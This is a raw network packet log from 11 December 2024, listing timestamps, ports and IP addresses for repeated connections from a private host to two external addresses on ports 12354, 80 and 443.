Dec 11, 2024 16:28:18.735486031 CET	443	50590	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:18.735538960 CET	50590	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:18.738462925 CET	50590	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:18.738470078 CET	443	50590	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:18.740372896 CET	50590	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:18.740377903 CET	443	50590	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:19.407819033 CET	50603	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:19.407857895 CET	50590	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:19.407892942 CET	50599	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:19.408377886 CET	50643	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:19.528655052 CET	50648	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:19.529350042 CET	50649	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:19.531333923 CET	50550	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:19.532121897 CET	12354	50643	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:19.532222033 CET	50643	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:19.532299995 CET	50643	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:19.651854992 CET	12354	50648	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:19.651876926 CET	80	50649	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:19.651999950 CET	50649	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:19.652107954 CET	50648	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:19.652107954 CET	50648	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:19.652231932 CET	50649	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:19.652301073 CET	12354	50643	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:19.653284073 CET	80	50550	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:19.653356075 CET	50550	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:19.771318913 CET	12354	50648	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:19.771576881 CET	80	50649	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:21.243556976 CET	80	50649	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:21.243747950 CET	50649	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:21.326884985 CET	50703	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:21.326917887 CET	443	50703	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:21.327004910 CET	50703	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:21.327322006 CET	50703	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:21.327332973 CET	443	50703	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:21.642935991 CET	12354	50643	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:21.643002033 CET	50643	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.643611908 CET	50643	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.644134045 CET	50713	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.763670921 CET	12354	50643	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:21.763684034 CET	12354	50713	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:21.763755083 CET	50713	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.765875101 CET	50713	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.771485090 CET	12354	50648	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:21.771821022 CET	50648	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.777287006 CET	50648	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.783288002 CET	50717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.889439106 CET	12354	50713	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:21.903700113 CET	12354	50648	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:21.907387018 CET	12354	50717	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:21.907454014 CET	50717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:21.908092976 CET	50717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:22.029416084 CET	12354	50717	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:23.014370918 CET	443	50703	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:23.014431000 CET	50703	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.014967918 CET	50703	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.014976978 CET	443	50703	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:23.017236948 CET	50703	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.017244101 CET	443	50703	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:23.432331085 CET	50703	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.432362080 CET	50713	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:23.432404041 CET	50717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:23.432853937 CET	50762	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:23.552119017 CET	12354	50762	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:23.552212954 CET	50762	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:23.552505016 CET	50762	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:23.637587070 CET	50770	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:23.638745070 CET	50771	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.639341116 CET	50649	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.673305035 CET	12354	50762	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:23.760622025 CET	12354	50770	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:23.760698080 CET	50770	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:23.763294935 CET	80	50771	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:23.763370037 CET	50771	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.764270067 CET	80	50649	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:23.765635967 CET	50649	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.766520977 CET	50770	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:23.766645908 CET	50771	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:23.886729002 CET	12354	50770	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:23.886840105 CET	80	50771	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:25.660586119 CET	12354	50762	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:25.660713911 CET	50762	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.660799026 CET	50762	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.661396980 CET	50838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.785046101 CET	12354	50762	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:25.785058975 CET	12354	50838	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:25.785131931 CET	50838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.785583973 CET	50838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.877361059 CET	12354	50770	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:25.877408028 CET	50770	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.877616882 CET	50770	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.878493071 CET	50845	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.905932903 CET	12354	50838	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:25.905944109 CET	12354	50838	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:25.906044006 CET	50838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.906397104 CET	50838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:25.995554924 CET	50850	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.110323906 CET	12354	50770	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.110377073 CET	12354	50845	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.110476017 CET	50845	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.111830950 CET	50845	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.225152969 CET	50838	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.316056967 CET	12354	50838	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.316066027 CET	12354	50838	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.320266008 CET	12354	50850	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.320331097 CET	50850	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.320516109 CET	50850	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.325495958 CET	12354	50845	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.346038103 CET	12354	50838	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.440701008 CET	12354	50850	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.440711021 CET	12354	50850	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.441445112 CET	50865	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.562222004 CET	12354	50865	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.562303066 CET	50865	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.562505960 CET	50865	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.682193041 CET	12354	50865	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.682204008 CET	12354	50865	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.682843924 CET	50872	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.803308010 CET	12354	50872	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.803380966 CET	50872	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.806874990 CET	50872	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.924227953 CET	12354	50872	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.924284935 CET	50872	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.926588058 CET	12354	50872	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:26.927102089 CET	50872	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:26.927606106 CET	50885	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.043979883 CET	12354	50872	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.047367096 CET	12354	50872	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.047378063 CET	12354	50885	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.047441959 CET	50885	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.047611952 CET	50885	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.167396069 CET	12354	50885	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.168231010 CET	12354	50885	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.196041107 CET	50897	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.315612078 CET	12354	50897	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.315742016 CET	50897	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.315891981 CET	50897	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.435223103 CET	12354	50897	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.435411930 CET	12354	50897	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.436074018 CET	50916	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.553347111 CET	50771	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:27.553374052 CET	50845	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.553790092 CET	50923	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.555859089 CET	12354	50916	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.555936098 CET	50916	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.664375067 CET	50927	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.666323900 CET	50929	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:27.674582005 CET	12354	50923	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.676045895 CET	50923	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.676136971 CET	50923	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.787122011 CET	12354	50927	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.787190914 CET	50927	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.788156986 CET	80	50929	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:27.788158894 CET	50927	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.788213015 CET	50929	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:27.792555094 CET	50929	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:27.795799017 CET	12354	50923	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.796710014 CET	12354	50923	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.799896955 CET	50939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.907396078 CET	12354	50927	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.907442093 CET	50927	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.907509089 CET	50927	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.908252001 CET	12354	50927	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.908263922 CET	80	50929	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:27.908392906 CET	50929	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:27.908647060 CET	50929	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:27.911840916 CET	80	50929	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:27.916868925 CET	50945	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.919358969 CET	12354	50939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:27.919440985 CET	50939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:27.919553995 CET	50939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.025825024 CET	50956	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.027379036 CET	12354	50927	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.027390003 CET	12354	50927	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.028224945 CET	80	50929	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.031369925 CET	80	50929	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.037269115 CET	12354	50945	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.037332058 CET	50945	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.037574053 CET	50945	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.039364100 CET	12354	50939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.039372921 CET	12354	50939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.039419889 CET	50939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.039549112 CET	50939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.040293932 CET	50957	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.145945072 CET	80	50956	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.146028996 CET	50956	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.146253109 CET	50956	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.157365084 CET	12354	50945	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.157377958 CET	12354	50945	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.157428980 CET	50945	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.157694101 CET	50945	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.159384012 CET	12354	50939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.159398079 CET	12354	50939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.159766912 CET	12354	50957	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.159962893 CET	50957	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.160213947 CET	50957	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.187513113 CET	50965	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.265676975 CET	80	50956	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.265690088 CET	80	50956	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.265734911 CET	50956	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.266493082 CET	50956	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.277030945 CET	12354	50945	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.277067900 CET	12354	50945	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.280256033 CET	12354	50957	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.280268908 CET	12354	50957	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.280320883 CET	50957	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.283596992 CET	50957	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.292052031 CET	50966	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.307583094 CET	12354	50965	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.307661057 CET	50965	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.307828903 CET	50965	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.385019064 CET	80	50956	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.385966063 CET	80	50956	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.392951965 CET	50971	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.402970076 CET	12354	50957	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.403213978 CET	12354	50957	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.411385059 CET	12354	50966	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.411454916 CET	50966	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.412017107 CET	50966	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.427422047 CET	12354	50965	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.427472115 CET	12354	50965	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.427928925 CET	50973	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.512646914 CET	80	50971	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.512911081 CET	50971	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.512911081 CET	50971	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.531331062 CET	12354	50966	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.531341076 CET	12354	50966	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.531387091 CET	50966	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.531438112 CET	50966	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.547379017 CET	12354	50973	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.547467947 CET	50973	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.547658920 CET	50973	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.610898018 CET	50984	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.633133888 CET	80	50971	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.633145094 CET	80	50971	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.650768995 CET	12354	50966	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.650783062 CET	12354	50966	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.667368889 CET	12354	50973	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.668242931 CET	12354	50973	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.668932915 CET	50987	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.730355978 CET	12354	50984	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.730492115 CET	50984	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.730633020 CET	50984	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.780510902 CET	50995	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.788921118 CET	12354	50987	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.789078951 CET	50987	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.789135933 CET	50987	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.850194931 CET	12354	50984	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.850424051 CET	12354	50984	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.851453066 CET	50998	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.899765015 CET	80	50995	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:28.899836063 CET	50995	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.907360077 CET	50995	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:28.908551931 CET	12354	50987	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.908734083 CET	12354	50987	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.970900059 CET	12354	50998	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:28.970988989 CET	50998	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.972698927 CET	51005	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:28.973577023 CET	50998	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.020266056 CET	80	50995	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.020332098 CET	50995	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.020986080 CET	50995	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.026771069 CET	80	50995	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.091391087 CET	12354	50998	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.091448069 CET	50998	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.091538906 CET	50998	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.092025995 CET	51012	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.092099905 CET	12354	51005	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.092165947 CET	51005	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.092278004 CET	51005	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.093118906 CET	12354	50998	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.139578104 CET	80	50995	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.140245914 CET	80	50995	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.200227976 CET	51020	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.210928917 CET	12354	50998	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.210938931 CET	12354	50998	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.211338043 CET	12354	51012	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.211422920 CET	51012	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.211450100 CET	12354	51005	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.211585999 CET	12354	51005	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.213087082 CET	51012	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.213504076 CET	51021	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.319530010 CET	80	51020	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.319713116 CET	51020	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.321450949 CET	51020	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.331060886 CET	12354	51012	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.331726074 CET	51012	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.331779003 CET	51012	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.332293034 CET	12354	51012	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.332760096 CET	12354	51021	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.332854033 CET	51021	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.333044052 CET	51021	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.338757992 CET	51029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.445996046 CET	80	51020	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.446544886 CET	51020	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.446995020 CET	51020	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.447415113 CET	80	51020	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.457756042 CET	12354	51012	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.457820892 CET	12354	51012	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.459068060 CET	12354	51021	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.459317923 CET	12354	51021	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.460654020 CET	51037	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.561672926 CET	51044	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.613656998 CET	12354	51029	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.613743067 CET	51029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.615823984 CET	80	51020	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.615834951 CET	80	51020	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.616025925 CET	12354	51037	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.616190910 CET	51037	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.621289968 CET	51029	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.621835947 CET	51037	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.681133032 CET	80	51044	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.683334112 CET	51044	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.694099903 CET	51044	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.738080025 CET	12354	51037	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.738152027 CET	51037	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.741760015 CET	12354	51029	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.741794109 CET	12354	51037	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.805486917 CET	51037	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.806376934 CET	51048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.807404041 CET	80	51044	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.811606884 CET	51044	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.826005936 CET	80	51044	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.840771914 CET	51044	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:29.858372927 CET	12354	51037	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.927635908 CET	12354	51037	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.928580046 CET	12354	51048	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:29.928798914 CET	51048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:29.934638977 CET	80	51044	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:29.966031075 CET	80	51044	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:30.005439997 CET	51048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:30.127098083 CET	12354	51048	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:30.540096998 CET	51051	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:30.659348965 CET	80	51051	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:30.659439087 CET	51051	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:30.916925907 CET	51051	80	192.168.2.7	202.108.0.52
